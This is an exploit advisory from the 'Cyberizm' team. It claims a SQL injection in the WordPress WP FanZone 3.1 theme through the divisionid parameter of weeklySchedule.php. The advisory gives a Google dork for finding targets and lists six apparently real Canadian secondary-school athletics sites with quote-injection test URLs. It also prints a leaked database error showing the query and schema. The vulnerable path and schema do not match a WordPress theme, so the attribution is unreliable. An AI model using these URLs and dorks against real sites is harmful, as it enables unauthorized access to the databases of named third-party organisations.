WordPress WP Fanzone theme version 3.1 suffers from a remote SQL injection vulnerability.
# Exploit Title : Built with WordPress and WP FanZone Themes 3.1 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/01/2020
# Vendor Homepage : wordpress.org - wpdevshed.com/wp-fanzone-theme/
# Software Download Link : downloads.wordpress.org/theme/wp-fanzone.3.1.zip
# Software Version : 3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dork : Built with WordPress and WP FanZone site:ca
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Description About Software :
WP Fan Zone was designed orginally with sports fans and bloggers in mind,
but it could easily be used for any type of blog or magazine style site that wants to
feature images and content. It is fully responsive, comes with two main menus, and
widget areas for all page types. It also has customization options for social media
links, color scheme and author bios, plus a simple banner widget for putting ads in the header.
# Impact :
Built with WordPress and WP FanZone 3.1 is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in application`s database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.
# Administrator Login Path :
# SQL Injection Exploit :
/weeklySchedule.php?schoolid=[ID-NUMBER]&date=ALL&leagueid=[ID-NUMBER]&divisionid=[SQL Injection]
# Example Vulnerable Sites :
LOSSA Lake Ontario Secondary School Athletics
[+] lossa.on.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
LKSSAA Lambton Kent Secondary School Athletic Association
[+] lkssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
Sudbury District Secondary Schools' Athletic Association
[+] sdssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
BCSSAA Brant County Secondary Schools' Athletic Association
[+] bcssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
Huron Perth Athletic Association
[+] hpathletics.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
NRHSAA Niagara Region High School Athletic Association
[+] nrhsaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
# Example SQL Database Error :
Failed Query: SELECT gameid, hometeamid, homessid, awayteamid, awayssid, dateandtime,
specialnotes, DATE_FORMAT(dateandtime, '%h:%i %p') AS gametime, DATE_FORMAT
(dateandtime, '%W, %M %e, %Y') as formattedDate, substring(dateandtime, 1, 10) AS gdate,
scoreupdated, hometeamscore, hometeamstats, awayteamscore, awayteamstats,
schedule_results.leagueid AS leagueid, sportName, levelName, genderName, leagueName,
locationName, locations.locationid AS locationid FROM schedule_results, sports, leagues,
locations, levels, genders WHERE sports.sportid = leagues.sportid AND schedule_results.
locationid = locations.locationid AND levels.levelID = leagues.levelID AND genders.genderID =
leagues.genderID AND scheduleLive = 1 AND YEARWEEK(dateandtime) = '202003' AND
schedule_results.leagueid = leagues.leagueid AND (hometeamid = 17 OR awayteamid = 17)
AND schedule_results.leagueid = '16' AND (hometeamid IN (SELECT schoolid FROM
standings WHERE leagueid = 16 AND divisionid = 1\') OR awayteamid IN (SELECT schoolid
FROM standings WHERE leagueid = 16 AND divisionid = 1\')) ORDER BY dateandtime,
leagueid<br>SQL Error: You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '\') OR awayteamid IN
(SELECT schoolid FROM standings WHERE leagueid = 16 AND div' at line 1
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team